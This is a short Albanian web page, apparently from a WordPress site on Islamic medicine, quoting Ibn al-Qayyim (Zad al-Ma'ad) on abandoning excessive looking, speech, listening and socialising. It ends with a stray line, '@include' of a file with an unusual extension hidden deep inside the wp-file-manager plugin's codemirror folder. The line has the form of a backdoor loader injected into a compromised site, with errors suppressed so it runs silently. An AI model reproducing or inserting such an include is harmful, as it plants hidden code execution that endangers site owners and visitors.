Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Njeriu duhet të braktisë

Njeriu duhet të braktisë

Ibn Kajjimi (Allahu e mëshiroftë) ka thënë:

“Njeriu duhet të braktisë:

Shikimin e tepërt
Të folurit e tepërt
Dëgjimin e tepërt dhe
Përzierjen e tepërt me njerëz,
Sepse këto teprime shkaktojnë dhimbje, brenga e pikëllime në zemrën e tij.”

(Zad El-Me’ad, 2/32)

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";